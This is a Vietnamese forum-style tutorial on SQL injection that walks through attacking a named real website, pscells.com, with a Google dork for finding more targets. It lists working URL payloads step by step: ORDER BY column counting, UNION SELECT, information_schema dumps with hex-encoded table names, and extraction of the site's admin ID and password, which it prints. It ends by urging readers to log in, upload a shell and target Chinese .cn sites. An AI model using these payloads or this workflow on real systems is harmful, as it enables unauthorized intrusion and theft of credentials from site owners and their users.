Đầu Tiên ! Xin Chào Mng ^_^ mình mới tham gia forum nên có gì ko đúng các pro chỉ thêm ^^!
Tiếp theo ... Cần Chuẩn Bị :
1.Hackbar (Vào https://addons.mozilla.org/vi/firefox -> search " Hackbar " )
2. 1 cái đầu và những ngón tay =]]z~
Bây Giờ Tiến Hành Với Victim Nhé !
Victim : http://pscells.com ( Hoặc Có Thế Lên Google Gõ "inurl:index.php?id=" Để Dork tìm Site Bị Lỗi SQL )
Đi 1 Vòng Site Tìm Link Có Dạng ?id=
Chẳng hạn như link này : http://pscells.com/chitietsanpham.php?id=40
Tiếp Theo Kiểm Tra Lỗi Bằng Cách Thêm Dấu ' Vào Và Ta Đc Link Như Thế Này :
http://pscells.com/chitietsanpham.php?id=40'
Nếu Site Có Lỗi Thì Nó Sẽ Hiện Như Thế này :
Sau Đó Dùng Lệnh Order By Để Tìm Số Cột (Column)
http://pscells.com/chitietsanpham.php?id=40 order by 5-- - ==> Ko Lỗi
http://pscells.com/chitietsanpham.php?id=40 order by 10-- - ==> Lỗi
Vậy : 5 < x < 10
Tìm Tiếp :
http://pscells.com/chitietsanpham.php?id=40 order by 7-- - ==> Ko Lỗi
Vậy : 7 < x < 10
Tiếp Nào :
http://pscells.com/chitietsanpham.php?id=40 order by 9-- - ==> Lỗi
Vậy : 7 < x < 9 ===> Thế Số Cột (Column) Là 8 Nhé
Bây h Dùng Lệnh UNION SELECT để khai thác nó
Vậy ta sẽ dùng lệnh UNION SELECT với số cột là 8
Ta Sẽ Có Link :
http://pscells.com/chitietsanpham.php?id=40 UNION SELECT 1,2,3,4,5,6,7,8-- -
Trường Hợp Vài Site Khi Khai Thác Lệnh Này Xoq Vẫn Ko Thấy Gì ==> Cách Giải Quyết :
Thay Null Vào ?id=40 Có Nghĩa Là Link Sẽ Thành :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,6,7,8-- -
Nếu Cột Nào Đó Từ 1 -> 8 Bị Lỗi Sẽ Xuất Hiện Như Hình :
Vậy Cột 6 Bị Lỗi Nhé
Bây giờ ta khai thác với lệnh như sau:
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -
( Thay Thế Group_concat(table_name) vào số cột bị lỗi mà ta đã tìm hồi nãy ( cột 6 ) , Thêm from information_schema.tables where table_schema=database() Để Tìm Ra Cách Table Có Trong Database )
Và Sau Đó Ta Đc Các Table Của Database Như Hình :
Lưu Ý Chúng Ta Cần Tìm ID và Pass Của Admin , Nên Ta Sẽ Chọn Table Có Liên Quan Đến Tài Khoản Người Dùng . Như Troq Hình Là Table " Taikhoan "
Tiếp Theo Tìm Các Column Trong Table taikhoan . Cần Phãi Encode tên table sang mã Hex Và thêm trước nó "0x" Để Hệ Thống Biết Đó Là Mã Hex . Mã Hex cũa taikhoan là 7461696b686f616e Thêm "0x" ỡ đầu sẽ thành :
0x7461696b686f616e <== Thay Mã Hex này Với Database() như Hình :
Và Sửa Link ỡ 1 vài chỗ :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8 from information_schema.tables where table_schema=database()-- -
Thành
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(column_name),7,8 from information_schema.columns where table_name=0x7461696b686f616e-- -
Ta sẽ được:
Tiếp theo lấy giá trị từ các column này ra ( Ko Cần Dùng Mã Hex Cho Các Tên Column Này )
Đổi link ỡ 1 số chỗ :
http://pscells.com/chitietsanpham.php?id=null UNION SELECT 1,2,3,4,5,group_concat(id,0x207c20,name,0x207c20,pass,0x207c20),7,8 from taikhoan-- -
Lưu ý: Mã Hex 0x207c20 Là Mã Hex Của " | " Mình Đễ Vậy Để Phân Cách Các Giá Trị Sau Khi Get Cho Dễ Nhìn ^^! Ko Cần Thiết Lắm
Xóa Hết Phần Sau Chừa Lại from Và Thêm Tên Table Mà Hồi Nãy Mình Khai Thác Như : taikhoan
Và Ta Sẽ Đc Như Hình :
Như hình trên. Ta được 1 ID Admin Là :
ID: Admin
Pass : @#123@#
Số 1 Là Số User troq site ^^
Thế là xong ! Tìm link admin và đăng nhập vào thôi ^_^ ^_^!!
Thế Là Xoq Rồi Nhé ^^! Nếu Thích Bạn Cứ Úp Shell ( Mình Ko Khuyến Khích Các Bạn Deface ^_^ )
Update Cho Các Bạn Thêm Video Của anh RaZoR đễ các bạn nắm rõ hơn ^^!
Tìm Những Site TQ Có Đuôi Là .cn mà quậy =]]z~
Nguồn : Học Ỡ các forum IT rồi tự viết tut
- JVL -
Hiển thị các bài đăng có nhãn Hacking và Bảo Mật. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn Hacking và Bảo Mật. Hiển thị tất cả bài đăng
